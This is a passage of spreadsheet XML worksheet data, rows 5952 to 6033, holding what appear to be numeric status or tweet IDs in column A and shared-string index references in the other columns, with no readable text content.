      <c r="E5952" t="s">
        <v>6548</v>
      </c>
    </row>
    <row r="5953" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5953">
        <v>1.23369344517006E+18</v>
      </c>
      <c r="B5953" t="s">
        <v>14603</v>
      </c>
      <c r="C5953" t="s">
        <v>1</v>
      </c>
      <c r="D5953" t="s">
        <v>14604</v>
      </c>
      <c r="E5953" t="s">
        <v>14605</v>
      </c>
    </row>
    <row r="5954" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5954">
        <v>1.23369343095554E+18</v>
      </c>
      <c r="B5954" t="s">
        <v>14606</v>
      </c>
      <c r="C5954" t="s">
        <v>1</v>
      </c>
      <c r="D5954" t="s">
        <v>14607</v>
      </c>
      <c r="E5954" t="s">
        <v>7894</v>
      </c>
    </row>
    <row r="5955" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5955">
        <v>1.2336927444528499E+18</v>
      </c>
      <c r="B5955" t="s">
        <v>14608</v>
      </c>
      <c r="C5955" t="s">
        <v>1</v>
      </c>
      <c r="D5955" t="s">
        <v>14609</v>
      </c>
      <c r="E5955" t="s">
        <v>14182</v>
      </c>
    </row>
    <row r="5956" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5956">
        <v>1.23369100409776E+18</v>
      </c>
      <c r="B5956" t="s">
        <v>14610</v>
      </c>
      <c r="C5956" t="s">
        <v>1</v>
      </c>
      <c r="D5956" t="s">
        <v>14611</v>
      </c>
      <c r="E5956" t="s">
        <v>14612</v>
      </c>
    </row>
    <row r="5957" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5957">
        <v>1.2336906205496399E+18</v>
      </c>
      <c r="B5957" t="s">
        <v>14613</v>
      </c>
      <c r="C5957" t="s">
        <v>1</v>
      </c>
      <c r="D5957" t="s">
        <v>14614</v>
      </c>
      <c r="E5957" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5958" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5958">
        <v>1.23369012597406E+18</v>
      </c>
      <c r="B5958" t="s">
        <v>14615</v>
      </c>
      <c r="C5958" t="s">
        <v>1</v>
      </c>
      <c r="D5958" t="s">
        <v>14616</v>
      </c>
      <c r="E5958" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="5959" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5959">
        <v>1.2336900254574799E+18</v>
      </c>
      <c r="B5959" t="s">
        <v>14617</v>
      </c>
      <c r="C5959" t="s">
        <v>1</v>
      </c>
      <c r="D5959" t="s">
        <v>14618</v>
      </c>
      <c r="E5959" t="s">
        <v>14619</v>
      </c>
    </row>
    <row r="5960" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5960">
        <v>1.2336895388931699E+18</v>
      </c>
      <c r="B5960" t="s">
        <v>14620</v>
      </c>
      <c r="C5960" t="s">
        <v>1</v>
      </c>
      <c r="D5960" t="s">
        <v>14621</v>
      </c>
      <c r="E5960" t="s">
        <v>14622</v>
      </c>
    </row>
    <row r="5961" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5961">
        <v>1.2336888517067899E+18</v>
      </c>
      <c r="B5961" t="s">
        <v>14623</v>
      </c>
      <c r="C5961" t="s">
        <v>1</v>
      </c>
      <c r="D5961" t="s">
        <v>14624</v>
      </c>
      <c r="E5961" t="s">
        <v>13129</v>
      </c>
    </row>
    <row r="5962" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5962">
        <v>1.2336876759635999E+18</v>
      </c>
      <c r="B5962" t="s">
        <v>14625</v>
      </c>
      <c r="C5962" t="s">
        <v>1</v>
      </c>
      <c r="D5962" t="s">
        <v>14626</v>
      </c>
      <c r="E5962" t="s">
        <v>1372</v>
      </c>
    </row>
    <row r="5963" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5963">
        <v>1.23368759157842E+18</v>
      </c>
      <c r="B5963" t="s">
        <v>14627</v>
      </c>
      <c r="C5963" t="s">
        <v>1</v>
      </c>
      <c r="D5963" t="s">
        <v>14628</v>
      </c>
      <c r="E5963" t="s">
        <v>14629</v>
      </c>
    </row>
    <row r="5964" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5964">
        <v>1.23368712920254E+18</v>
      </c>
      <c r="B5964" t="s">
        <v>14630</v>
      </c>
      <c r="C5964" t="s">
        <v>1</v>
      </c>
      <c r="D5964" t="s">
        <v>14631</v>
      </c>
      <c r="E5964" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="5965" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5965">
        <v>1.23368642234913E+18</v>
      </c>
      <c r="B5965" t="s">
        <v>14632</v>
      </c>
      <c r="C5965" t="s">
        <v>1</v>
      </c>
      <c r="D5965" t="s">
        <v>14633</v>
      </c>
      <c r="E5965" t="s">
        <v>14634</v>
      </c>
    </row>
    <row r="5966" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5966">
        <v>1.23368585258207E+18</v>
      </c>
      <c r="B5966" t="s">
        <v>14635</v>
      </c>
      <c r="C5966" t="s">
        <v>1</v>
      </c>
      <c r="D5966" t="s">
        <v>14636</v>
      </c>
      <c r="E5966" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="5967" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5967">
        <v>1.2336858427549599E+18</v>
      </c>
      <c r="B5967" t="s">
        <v>14637</v>
      </c>
      <c r="C5967" t="s">
        <v>1</v>
      </c>
      <c r="D5967" t="s">
        <v>14638</v>
      </c>
      <c r="E5967" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="5968" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5968">
        <v>1.23368476194143E+18</v>
      </c>
      <c r="B5968" t="s">
        <v>14639</v>
      </c>
      <c r="C5968" t="s">
        <v>1</v>
      </c>
      <c r="D5968" t="s">
        <v>14640</v>
      </c>
      <c r="E5968" t="s">
        <v>14641</v>
      </c>
    </row>
    <row r="5969" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5969">
        <v>1.2336846983265999E+18</v>
      </c>
      <c r="B5969" t="s">
        <v>14642</v>
      </c>
      <c r="C5969" t="s">
        <v>1</v>
      </c>
      <c r="D5969" t="s">
        <v>14643</v>
      </c>
      <c r="E5969" t="s">
        <v>3375</v>
      </c>
    </row>
    <row r="5970" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5970">
        <v>1.23368466840014E+18</v>
      </c>
      <c r="B5970" t="s">
        <v>14644</v>
      </c>
      <c r="C5970" t="s">
        <v>1</v>
      </c>
      <c r="D5970" t="s">
        <v>14645</v>
      </c>
      <c r="E5970" t="s">
        <v>14646</v>
      </c>
    </row>
    <row r="5971" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5971">
        <v>1.23368197155905E+18</v>
      </c>
      <c r="B5971" t="s">
        <v>14647</v>
      </c>
      <c r="C5971" t="s">
        <v>1</v>
      </c>
      <c r="D5971" t="s">
        <v>14648</v>
      </c>
      <c r="E5971" t="s">
        <v>14649</v>
      </c>
    </row>
    <row r="5972" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5972">
        <v>1.2336818449919301E+18</v>
      </c>
      <c r="B5972" t="s">
        <v>14650</v>
      </c>
      <c r="C5972" t="s">
        <v>1</v>
      </c>
      <c r="D5972" t="s">
        <v>14651</v>
      </c>
      <c r="E5972" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="5973" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5973">
        <v>1.2336814215475699E+18</v>
      </c>
      <c r="B5973" t="s">
        <v>14652</v>
      </c>
      <c r="C5973" t="s">
        <v>1</v>
      </c>
      <c r="D5973" t="s">
        <v>14653</v>
      </c>
      <c r="E5973" t="s">
        <v>14654</v>
      </c>
    </row>
    <row r="5974" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5974">
        <v>1.2336811659257201E+18</v>
      </c>
      <c r="B5974" t="s">
        <v>14655</v>
      </c>
      <c r="C5974" t="s">
        <v>1</v>
      </c>
      <c r="D5974" t="s">
        <v>14656</v>
      </c>
      <c r="E5974" t="s">
        <v>3375</v>
      </c>
    </row>
    <row r="5975" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5975">
        <v>1.2336795977509399E+18</v>
      </c>
      <c r="B5975" t="s">
        <v>14657</v>
      </c>
      <c r="C5975" t="s">
        <v>1</v>
      </c>
      <c r="D5975" t="s">
        <v>14658</v>
      </c>
      <c r="E5975" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="5976" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5976">
        <v>1.23367893463985E+18</v>
      </c>
      <c r="B5976" t="s">
        <v>14659</v>
      </c>
      <c r="C5976" t="s">
        <v>1</v>
      </c>
      <c r="D5976" t="s">
        <v>14660</v>
      </c>
      <c r="E5976" t="s">
        <v>6793</v>
      </c>
    </row>
    <row r="5977" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5977">
        <v>1.23367880515744E+18</v>
      </c>
      <c r="B5977" t="s">
        <v>14661</v>
      </c>
      <c r="C5977" t="s">
        <v>1</v>
      </c>
      <c r="D5977" t="s">
        <v>14662</v>
      </c>
      <c r="E5977" t="s">
        <v>14663</v>
      </c>
    </row>
    <row r="5978" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5978">
        <v>1.2336785333330099E+18</v>
      </c>
      <c r="B5978" t="s">
        <v>14664</v>
      </c>
      <c r="C5978" t="s">
        <v>1</v>
      </c>
      <c r="D5978" t="s">
        <v>14665</v>
      </c>
      <c r="E5978" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="5979" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5979">
        <v>1.2336785092744699E+18</v>
      </c>
      <c r="B5979" t="s">
        <v>14666</v>
      </c>
      <c r="C5979" t="s">
        <v>1</v>
      </c>
      <c r="D5979" t="s">
        <v>14667</v>
      </c>
      <c r="E5979" t="s">
        <v>6340</v>
      </c>
    </row>
    <row r="5980" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5980">
        <v>1.2336783569959199E+18</v>
      </c>
      <c r="B5980" t="s">
        <v>14668</v>
      </c>
      <c r="C5980" t="s">
        <v>1</v>
      </c>
      <c r="D5980" t="s">
        <v>14669</v>
      </c>
      <c r="E5980" t="s">
        <v>14670</v>
      </c>
    </row>
    <row r="5981" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5981">
        <v>1.23367834649773E+18</v>
      </c>
      <c r="B5981" t="s">
        <v>14671</v>
      </c>
      <c r="C5981" t="s">
        <v>1</v>
      </c>
      <c r="D5981" t="s">
        <v>14672</v>
      </c>
      <c r="E5981" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="5982" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5982">
        <v>1.23367832666286E+18</v>
      </c>
      <c r="B5982" t="s">
        <v>14673</v>
      </c>
      <c r="C5982" t="s">
        <v>1</v>
      </c>
      <c r="D5982" t="s">
        <v>14674</v>
      </c>
      <c r="E5982" t="s">
        <v>2936</v>
      </c>
    </row>
    <row r="5983" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5983">
        <v>1.23367830377039E+18</v>
      </c>
      <c r="B5983" t="s">
        <v>14675</v>
      </c>
      <c r="C5983" t="s">
        <v>1</v>
      </c>
      <c r="D5983" t="s">
        <v>14676</v>
      </c>
      <c r="E5983" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5984" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5984">
        <v>1.2336782045205801E+18</v>
      </c>
      <c r="B5984" t="s">
        <v>14677</v>
      </c>
      <c r="C5984" t="s">
        <v>1</v>
      </c>
      <c r="D5984" t="s">
        <v>14678</v>
      </c>
      <c r="E5984" t="s">
        <v>14679</v>
      </c>
    </row>
    <row r="5985" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5985">
        <v>1.2336777815040599E+18</v>
      </c>
      <c r="B5985" t="s">
        <v>14680</v>
      </c>
      <c r="C5985" t="s">
        <v>1</v>
      </c>
      <c r="D5985" t="s">
        <v>14681</v>
      </c>
      <c r="E5985" t="s">
        <v>14682</v>
      </c>
    </row>
    <row r="5986" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5986">
        <v>1.2336771240341499E+18</v>
      </c>
      <c r="B5986" t="s">
        <v>14683</v>
      </c>
      <c r="C5986" t="s">
        <v>1</v>
      </c>
      <c r="D5986" t="s">
        <v>14684</v>
      </c>
      <c r="E5986" t="s">
        <v>14685</v>
      </c>
    </row>
    <row r="5987" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5987">
        <v>1.2336759626105999E+18</v>
      </c>
      <c r="B5987" t="s">
        <v>14686</v>
      </c>
      <c r="C5987" t="s">
        <v>1</v>
      </c>
      <c r="D5987" t="s">
        <v>14687</v>
      </c>
      <c r="E5987" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="5988" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5988">
        <v>1.23367430816307E+18</v>
      </c>
      <c r="B5988" t="s">
        <v>14688</v>
      </c>
      <c r="C5988" t="s">
        <v>1</v>
      </c>
      <c r="D5988" t="s">
        <v>14689</v>
      </c>
      <c r="E5988" t="s">
        <v>14690</v>
      </c>
    </row>
    <row r="5989" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5989">
        <v>1.23367378615267E+18</v>
      </c>
      <c r="B5989" t="s">
        <v>14691</v>
      </c>
      <c r="C5989" t="s">
        <v>1</v>
      </c>
      <c r="D5989" t="s">
        <v>14692</v>
      </c>
      <c r="E5989" t="s">
        <v>14693</v>
      </c>
    </row>
    <row r="5990" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5990">
        <v>1.23367251541277E+18</v>
      </c>
      <c r="B5990" t="s">
        <v>14694</v>
      </c>
      <c r="C5990" t="s">
        <v>1</v>
      </c>
      <c r="D5990" t="s">
        <v>14695</v>
      </c>
      <c r="E5990" t="s">
        <v>14696</v>
      </c>
    </row>
    <row r="5991" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5991">
        <v>1.23367196356798E+18</v>
      </c>
      <c r="B5991" t="s">
        <v>14697</v>
      </c>
      <c r="C5991" t="s">
        <v>1</v>
      </c>
      <c r="D5991" t="s">
        <v>14698</v>
      </c>
      <c r="E5991" t="s">
        <v>14699</v>
      </c>
    </row>
    <row r="5992" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5992">
        <v>1.23367128465709E+18</v>
      </c>
      <c r="B5992" t="s">
        <v>14700</v>
      </c>
      <c r="C5992" t="s">
        <v>1</v>
      </c>
      <c r="D5992" t="s">
        <v>14701</v>
      </c>
      <c r="E5992" t="s">
        <v>14273</v>
      </c>
    </row>
    <row r="5993" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5993">
        <v>1.2336711319341801E+18</v>
      </c>
      <c r="B5993" t="s">
        <v>14702</v>
      </c>
      <c r="C5993" t="s">
        <v>1</v>
      </c>
      <c r="D5993" t="s">
        <v>14703</v>
      </c>
      <c r="E5993" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5994" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5994">
        <v>1.2336707964107799E+18</v>
      </c>
      <c r="B5994" t="s">
        <v>14704</v>
      </c>
      <c r="C5994" t="s">
        <v>1</v>
      </c>
      <c r="D5994" t="s">
        <v>14705</v>
      </c>
      <c r="E5994" t="s">
        <v>3455</v>
      </c>
    </row>
    <row r="5995" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5995">
        <v>1.2336707426188401E+18</v>
      </c>
      <c r="B5995" t="s">
        <v>14706</v>
      </c>
      <c r="C5995" t="s">
        <v>1</v>
      </c>
      <c r="D5995" t="s">
        <v>14707</v>
      </c>
      <c r="E5995" t="s">
        <v>13536</v>
      </c>
    </row>
    <row r="5996" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5996">
        <v>1.23367053909443E+18</v>
      </c>
      <c r="B5996" t="s">
        <v>14708</v>
      </c>
      <c r="C5996" t="s">
        <v>1</v>
      </c>
      <c r="D5996" t="s">
        <v>14709</v>
      </c>
      <c r="E5996" t="s">
        <v>14710</v>
      </c>
    </row>
    <row r="5997" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5997">
        <v>1.2336679418975099E+18</v>
      </c>
      <c r="B5997" t="s">
        <v>14711</v>
      </c>
      <c r="C5997" t="s">
        <v>1</v>
      </c>
      <c r="D5997" t="s">
        <v>14712</v>
      </c>
      <c r="E5997" t="s">
        <v>14713</v>
      </c>
    </row>
    <row r="5998" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5998">
        <v>1.2336672850275599E+18</v>
      </c>
      <c r="B5998" t="s">
        <v>14714</v>
      </c>
      <c r="C5998" t="s">
        <v>1</v>
      </c>
      <c r="D5998" t="s">
        <v>14715</v>
      </c>
      <c r="E5998" t="s">
        <v>14716</v>
      </c>
    </row>
    <row r="5999" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5999">
        <v>1.2336670689328699E+18</v>
      </c>
      <c r="B5999" t="s">
        <v>14717</v>
      </c>
      <c r="C5999" t="s">
        <v>1</v>
      </c>
      <c r="D5999" t="s">
        <v>5</v>
      </c>
      <c r="E5999" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6000" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6000">
        <v>1.2336668583576399E+18</v>
      </c>
      <c r="B6000" t="s">
        <v>14718</v>
      </c>
      <c r="C6000" t="s">
        <v>1</v>
      </c>
      <c r="D6000" t="s">
        <v>14719</v>
      </c>
      <c r="E6000" t="s">
        <v>14720</v>
      </c>
    </row>
    <row r="6001" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6001">
        <v>1.2336663806936699E+18</v>
      </c>
      <c r="B6001" t="s">
        <v>14721</v>
      </c>
      <c r="C6001" t="s">
        <v>1</v>
      </c>
      <c r="D6001" t="s">
        <v>14722</v>
      </c>
      <c r="E6001" t="s">
        <v>1317</v>
      </c>
    </row>
    <row r="6002" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6002">
        <v>1.2336657174400399E+18</v>
      </c>
      <c r="B6002" t="s">
        <v>14723</v>
      </c>
      <c r="C6002" t="s">
        <v>1</v>
      </c>
      <c r="D6002" t="s">
        <v>14724</v>
      </c>
      <c r="E6002" t="s">
        <v>14725</v>
      </c>
    </row>
    <row r="6003" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6003">
        <v>1.2336646923854999E+18</v>
      </c>
      <c r="B6003" t="s">
        <v>14726</v>
      </c>
      <c r="C6003" t="s">
        <v>1</v>
      </c>
      <c r="D6003" t="s">
        <v>14727</v>
      </c>
      <c r="E6003" t="s">
        <v>3253</v>
      </c>
    </row>
    <row r="6004" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6004">
        <v>1.23366443711618E+18</v>
      </c>
      <c r="B6004" t="s">
        <v>14728</v>
      </c>
      <c r="C6004" t="s">
        <v>1</v>
      </c>
      <c r="D6004" t="s">
        <v>14729</v>
      </c>
      <c r="E6004" t="s">
        <v>9257</v>
      </c>
    </row>
    <row r="6005" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6005">
        <v>1.2336640162597299E+18</v>
      </c>
      <c r="B6005" t="s">
        <v>14730</v>
      </c>
      <c r="C6005" t="s">
        <v>1</v>
      </c>
      <c r="D6005" t="s">
        <v>14731</v>
      </c>
      <c r="E6005" t="s">
        <v>14182</v>
      </c>
    </row>
    <row r="6006" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6006">
        <v>1.23366377838816E+18</v>
      </c>
      <c r="B6006" t="s">
        <v>14732</v>
      </c>
      <c r="C6006" t="s">
        <v>1</v>
      </c>
      <c r="D6006" t="s">
        <v>14733</v>
      </c>
      <c r="E6006" t="s">
        <v>14734</v>
      </c>
    </row>
    <row r="6007" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6007">
        <v>1.2336606263351501E+18</v>
      </c>
      <c r="B6007" t="s">
        <v>14735</v>
      </c>
      <c r="C6007" t="s">
        <v>1</v>
      </c>
      <c r="D6007" t="s">
        <v>14736</v>
      </c>
      <c r="E6007" t="s">
        <v>14737</v>
      </c>
    </row>
    <row r="6008" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6008">
        <v>1.23366018873072E+18</v>
      </c>
      <c r="B6008" t="s">
        <v>14738</v>
      </c>
      <c r="C6008" t="s">
        <v>1</v>
      </c>
      <c r="D6008" t="s">
        <v>14739</v>
      </c>
      <c r="E6008" t="s">
        <v>14740</v>
      </c>
    </row>
    <row r="6009" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6009">
        <v>1.2336581722645901E+18</v>
      </c>
      <c r="B6009" t="s">
        <v>14741</v>
      </c>
      <c r="C6009" t="s">
        <v>1</v>
      </c>
      <c r="D6009" t="s">
        <v>14742</v>
      </c>
      <c r="E6009" t="s">
        <v>14471</v>
      </c>
    </row>
    <row r="6010" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6010">
        <v>1.2336568448597E+18</v>
      </c>
      <c r="B6010" t="s">
        <v>14743</v>
      </c>
      <c r="C6010" t="s">
        <v>1</v>
      </c>
      <c r="D6010" t="s">
        <v>14744</v>
      </c>
      <c r="E6010" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="6011" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6011">
        <v>1.2336557472143301E+18</v>
      </c>
      <c r="B6011" t="s">
        <v>14745</v>
      </c>
      <c r="C6011" t="s">
        <v>1</v>
      </c>
      <c r="D6011" t="s">
        <v>14746</v>
      </c>
      <c r="E6011" t="s">
        <v>14747</v>
      </c>
    </row>
    <row r="6012" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6012">
        <v>1.23365515262579E+18</v>
      </c>
      <c r="B6012" t="s">
        <v>14748</v>
      </c>
      <c r="C6012" t="s">
        <v>1</v>
      </c>
      <c r="D6012" t="s">
        <v>14749</v>
      </c>
      <c r="E6012" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="6013" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6013">
        <v>1.2336550625025999E+18</v>
      </c>
      <c r="B6013" t="s">
        <v>14750</v>
      </c>
      <c r="C6013" t="s">
        <v>1</v>
      </c>
      <c r="D6013" t="s">
        <v>14751</v>
      </c>
      <c r="E6013" t="s">
        <v>14752</v>
      </c>
    </row>
    <row r="6014" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6014">
        <v>1.2336549784237801E+18</v>
      </c>
      <c r="B6014" t="s">
        <v>14753</v>
      </c>
      <c r="C6014" t="s">
        <v>1</v>
      </c>
      <c r="D6014" t="s">
        <v>14754</v>
      </c>
      <c r="E6014" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="6015" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6015">
        <v>1.2336543924794501E+18</v>
      </c>
      <c r="B6015" t="s">
        <v>14755</v>
      </c>
      <c r="C6015" t="s">
        <v>1</v>
      </c>
      <c r="D6015" t="s">
        <v>14756</v>
      </c>
      <c r="E6015" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="6016" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6016">
        <v>1.2336541637263201E+18</v>
      </c>
      <c r="B6016" t="s">
        <v>14757</v>
      </c>
      <c r="C6016" t="s">
        <v>1</v>
      </c>
      <c r="D6016" t="s">
        <v>14758</v>
      </c>
      <c r="E6016" t="s">
        <v>14759</v>
      </c>
    </row>
    <row r="6017" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6017">
        <v>1.23365400336973E+18</v>
      </c>
      <c r="B6017" t="s">
        <v>14760</v>
      </c>
      <c r="C6017" t="s">
        <v>1</v>
      </c>
      <c r="D6017" t="s">
        <v>14761</v>
      </c>
      <c r="E6017" t="s">
        <v>6690</v>
      </c>
    </row>
    <row r="6018" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6018">
        <v>1.2336538664508201E+18</v>
      </c>
      <c r="B6018" t="s">
        <v>14762</v>
      </c>
      <c r="C6018" t="s">
        <v>1</v>
      </c>
      <c r="D6018" t="s">
        <v>14763</v>
      </c>
      <c r="E6018" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="6019" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6019">
        <v>1.23365328737263E+18</v>
      </c>
      <c r="B6019" t="s">
        <v>14764</v>
      </c>
      <c r="C6019" t="s">
        <v>1</v>
      </c>
      <c r="D6019" t="s">
        <v>14765</v>
      </c>
      <c r="E6019" t="s">
        <v>14766</v>
      </c>
    </row>
    <row r="6020" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6020">
        <v>1.23365261364577E+18</v>
      </c>
      <c r="B6020" t="s">
        <v>14767</v>
      </c>
      <c r="C6020" t="s">
        <v>1</v>
      </c>
      <c r="D6020" t="s">
        <v>14768</v>
      </c>
      <c r="E6020" t="s">
        <v>14769</v>
      </c>
    </row>
    <row r="6021" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6021">
        <v>1.23365238257741E+18</v>
      </c>
      <c r="B6021" t="s">
        <v>14770</v>
      </c>
      <c r="C6021" t="s">
        <v>1</v>
      </c>
      <c r="D6021" t="s">
        <v>14771</v>
      </c>
      <c r="E6021" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="6022" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6022">
        <v>1.23365216911246E+18</v>
      </c>
      <c r="B6022" t="s">
        <v>14772</v>
      </c>
      <c r="C6022" t="s">
        <v>1</v>
      </c>
      <c r="D6022" t="s">
        <v>14773</v>
      </c>
      <c r="E6022" t="s">
        <v>14427</v>
      </c>
    </row>
    <row r="6023" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6023">
        <v>1.2336515935784499E+18</v>
      </c>
      <c r="B6023" t="s">
        <v>14774</v>
      </c>
      <c r="C6023" t="s">
        <v>1</v>
      </c>
      <c r="D6023" t="s">
        <v>14775</v>
      </c>
      <c r="E6023" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="6024" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6024">
        <v>1.2336514187641201E+18</v>
      </c>
      <c r="B6024" t="s">
        <v>14776</v>
      </c>
      <c r="C6024" t="s">
        <v>1</v>
      </c>
      <c r="D6024" t="s">
        <v>14777</v>
      </c>
      <c r="E6024" t="s">
        <v>6690</v>
      </c>
    </row>
    <row r="6025" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6025">
        <v>1.2336506810615501E+18</v>
      </c>
      <c r="B6025" t="s">
        <v>14778</v>
      </c>
      <c r="C6025" t="s">
        <v>1</v>
      </c>
      <c r="D6025" t="s">
        <v>14779</v>
      </c>
      <c r="E6025" t="s">
        <v>11785</v>
      </c>
    </row>
    <row r="6026" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6026">
        <v>1.23365066033742E+18</v>
      </c>
      <c r="B6026" t="s">
        <v>14780</v>
      </c>
      <c r="C6026" t="s">
        <v>1</v>
      </c>
      <c r="D6026" t="s">
        <v>14781</v>
      </c>
      <c r="E6026" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="6027" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6027">
        <v>1.2336505346004301E+18</v>
      </c>
      <c r="B6027" t="s">
        <v>14782</v>
      </c>
      <c r="C6027" t="s">
        <v>1</v>
      </c>
      <c r="D6027" t="s">
        <v>14783</v>
      </c>
      <c r="E6027" t="s">
        <v>13040</v>
      </c>
    </row>
    <row r="6028" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6028">
        <v>1.23365021594259E+18</v>
      </c>
      <c r="B6028" t="s">
        <v>14784</v>
      </c>
      <c r="C6028" t="s">
        <v>1</v>
      </c>
      <c r="D6028" t="s">
        <v>14785</v>
      </c>
      <c r="E6028" t="s">
        <v>14786</v>
      </c>
    </row>
    <row r="6029" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6029">
        <v>1.2336501068864901E+18</v>
      </c>
      <c r="B6029" t="s">
        <v>14787</v>
      </c>
      <c r="C6029" t="s">
        <v>1</v>
      </c>
      <c r="D6029" t="s">
        <v>14788</v>
      </c>
      <c r="E6029" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="6030" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6030">
        <v>1.2336493499444301E+18</v>
      </c>
      <c r="B6030" t="s">
        <v>14789</v>
      </c>
      <c r="C6030" t="s">
        <v>1</v>
      </c>
      <c r="D6030" t="s">
        <v>14790</v>
      </c>
      <c r="E6030" t="s">
        <v>14791</v>
      </c>
    </row>
    <row r="6031" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6031">
        <v>1.2336491332164101E+18</v>
      </c>
      <c r="B6031" t="s">
        <v>14792</v>
      </c>
      <c r="C6031" t="s">
        <v>1</v>
      </c>
      <c r="D6031" t="s">
        <v>14793</v>
      </c>
      <c r="E6031" t="s">
        <v>13040</v>
      </c>
    </row>
    <row r="6032" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6032">
        <v>1.2336489771255401E+18</v>
      </c>
      <c r="B6032" t="s">
        <v>14794</v>
      </c>
      <c r="C6032" t="s">
        <v>1</v>
      </c>
      <c r="D6032" t="s">
        <v>14795</v>
      </c>
      <c r="E6032" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="6033" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6033">
        <v>1.23364824749694E+18</v>
      </c>
      <c r="B6033" t="s">
        <v>14796</v>
      </c>
      <c r="C6033" t="s">
        <v>1</v>
      </c>
      <c r="D6033" t="s">
        <v>1798</v>
      </c>
      <c r="E6033" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="6034" spans="1:5" x14ac:dyDescent="0.25">
